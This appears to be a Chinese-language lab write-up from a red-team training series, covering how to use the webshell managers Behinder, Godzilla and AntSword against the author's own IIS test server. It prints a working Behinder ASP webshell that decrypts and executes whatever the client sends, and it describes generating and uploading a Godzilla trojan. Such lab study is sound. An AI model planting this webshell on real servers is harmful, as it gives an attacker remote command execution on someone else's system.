A15.WEB主机-其他Webshell管理工具

WEB主机-其他Webshell管理工具

新的Webshell管理工具

中国菜刀从2016年之后,再没有公开出新的版本。近些年,Web防火墙兴起,在静态查杀、流量通信等方面对Webshell进行拦截。因此新出现的一些Webshell管理工具,如冰蝎、哥斯拉,支持对流量进行动态二进制加密通信,同时也具备更多功能,成为了红队攻防演练中常用的工具。

以下实验是为了熟悉一些新的Webshell管理工具的用法,因此直接在Web服务器的目录下手动创建了Webshell。

冰蝎

GitHub项目地址:Https://Github.Com/Rebeyond/Behinder/Releases

在冰蝎这个出现以前,中国菜刀一直是国内的白帽子、黑帽子常用的Webshell管理工具。相比菜刀,而冰蝎的主要特点是使用加密隧道传输数据,尽可能避免流量被WAF或IDS设备所捕获。此外,冰蝎使用Java开发,支持跨平台运行。

使用冰蝎V3.0版本,在网站根目录下新建一个名为shell.asp的文件并写入以下内容,因为普通的一句话冰蝎无法连接。

<%
response.charset = "utf-8"
k="e45e329feb5d925b"
session("k")=k
size=request.totalbytes
content=request.binaryread(size)
for i=1 to size
x=ascb(midb(content,i,1))
y=asc(mid(k,(i and 15)+1,1))
z=z&chr( x xor y)
next
execute(z)
%>

该密钥为连接密码32位MD5值的前16位,默认连接密码rebeyond

打开冰蝎V3.0,新增Shell,按照情况填写内容。

填写完成后双击连接,地址栏右侧“已连接”,下方“基本信息”出数据就算连接成功。

多测试几个功能。使用命令执行功能执行whoami回显结果是iis apppool\web。

(冰蝎4.0.2最新版Asp无法正常连接,提示[ERROR]连接失败: Java.Lang.Arrayindexoutofboundsexception:Null)

哥斯拉

GitHub项目地址:Https://Github.Com/Beichendream/Godzilla/

冰蝎3.0的发布缓解了流量加密的困境,但是冰蝎3.0的bug众多,很多朋友甚至连不上冰蝎的shell,于是另一个团队的师傅开发了这款“哥斯拉”工具。

打开哥斯拉,在头部菜单栏中选择“管理”菜单内的“生成”,输入和选择相关信息后生成一句话木马。保存为B.Asp后上传到Web网站根目录,然后使用“添加”功能连接该Shell,如默认密码密钥的情况下只需要确定Url地址即可正常连接。

进入该Shell后,基础信息中可以看到很多比较详细的内容,经过测试,命令执行、文件管理正常使用,其whoami结果也是iis apppool\web。

中国蚁剑

除了上面的几个工具,中国蚁剑也是一些人常用的工具,因此还是提一下。

GitHub项目地址:https://github.com/antswordproject/

下载中国蚁剑的时候需要下载两个部分,一个是项目核心源码“Antsword”,另一个是加载器“Antsword-Loader”,本实验使用Windows版本的加载器,具体使用方法请自行通过搜索相关关键词进行学习。使用中国蚁剑的虚拟终端执行命令whoami回显结果同样为:iis apppool\web。

问题:在Webshell工具虚拟终端执行whoami看到用户是iis apppool\web,这个用户是由什么决定的?是网站ASP文件的所有者,是Webshell文件的所有者,还是其它?

注意:将获得Webshell以后的WEB虚拟机状态,建立一个快照,起名为“Webshell”。因为后续在进行内网安全测试时,会使用两种不同的路径去实现目标。在使用第二种方法时,需要将WEB机还原到此快照状态。

posted @ 2026-05-11 18:00  putiji  阅读(45)  评论(0)    收藏  举报